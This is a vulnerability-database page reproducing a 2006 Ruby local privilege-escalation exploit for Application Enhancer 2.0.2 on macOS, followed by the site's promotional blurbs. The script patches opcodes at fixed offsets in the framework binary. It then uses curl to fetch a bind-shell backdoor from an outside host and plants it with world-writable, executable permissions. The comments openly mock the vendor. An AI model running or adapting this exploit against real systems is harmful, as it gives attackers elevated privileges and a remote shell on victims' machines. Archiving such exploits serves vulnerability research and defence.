Vulners
Lucene search
Application Enhancer (APE) 2.0.2 - Local Privilege Escalation
# !/usr/bin/ruby
# Exploit Of The Apes: A practical pwnage for Application (UN)Enhancer aka APU
# (c) 2006 LMH <lmh [at] info-pull.com> and Johnny Pwnerseed.
#
# This goes dedicated to #macdev. For the childish flaming and great brain lag.
#
# Lesson: Don't talk about stuff you have NFC about. And don't insult
# people. Once you do it, and get pwned, total lulz ensues ;o(
#
# MD5 (ApplicationEnhancer) = cf9bf1fa74f8298f09aedce38c72a7da
# at offset 27512 0x807d0014 -> 0x38600000
# at offset 115586 0x8b4614890424 -> 0x31c090890424
#
require 'fileutils'
# Define offsets to opcodes to be patched
PATCH_INSTRUCTIONS = [
[ 27512, "\x38\x60\x00\x00" ],
[ 115586, "\x31\xc0\x90\x89\x04\x24" ]
]
BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell
PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework"
PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework"
path_to_bozo = (ARGV[0] || File.join(PATH_TO_APE,"Versions/Current/ApplicationEnhancer"))
puts "++ Starting: #{PATH_TO_APE}"
puts "++ Back-up: #{PATH_TO_APU}"
# Move the original framework to back-up, copy contents back, set permissions.
# To repair:
# rm -rf /Library/Frameworks/ApplicationEnhancer.framework
# mv /Library/Frameworks/ApplicationUnenhancer.framework \
# /Library/Frameworks/ApplicationEnhancer.framework
if File.exists?(PATH_TO_APE)
unless File.exists?(PATH_TO_APU)
FileUtils.mv(PATH_TO_APE, PATH_TO_APU)
FileUtils.cp_r(PATH_TO_APU, PATH_TO_APE)
system "chmod u+w #{File.join(PATH_TO_APE, "Versions/A/ApplicationEnhancer")}"
end
end
# Patching poor Apu (we could just replace the binary, but this is cooler as the
# guys at Unsanity, LLC think they can dropriv and forget all about flawed code...).
bozo = File.read(path_to_bozo)
puts "++ Patch: #{path_to_bozo}"
PATCH_INSTRUCTIONS.each do |patch|
offset = patch[0] # start offset
bindata = patch[1] # patch bytes
bcount = 0
puts "++ Patching stage: offset=#{offset} patch size=#{bindata.size}"
bindata.split(//).each do |patch_byte|
target_offset = offset + bcount
printf "++ Patching byte at %x\n", target_offset
bozo[target_offset] = patch_byte
bcount += 1
end
end
puts "++ Binary pwnage done. Writing patched data..."
u_bozo = File.new(File.join(PATH_TO_APE, "/Versions/A/ApplicationEnhancer"), "w")
u_bozo.write(bozo)
u_bozo.close
puts "++ Done (#{bozo.size} bytes). Planting backdoor aped binary..."
aped_path = File.join(PATH_TO_APE, "Resources/aped")
system "chmod a+rxw #{aped_path}" # let everyone backdoor it afterwards, be social and share!
system "curl #{BACKDOO_URL} -o #{aped_path}"
system "chmod a+x #{aped_path}"
puts "++ Finished."
# milw0rm.com [2007-01-08]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jan 2007 00:00Current
7High risk
Vulners AI Score7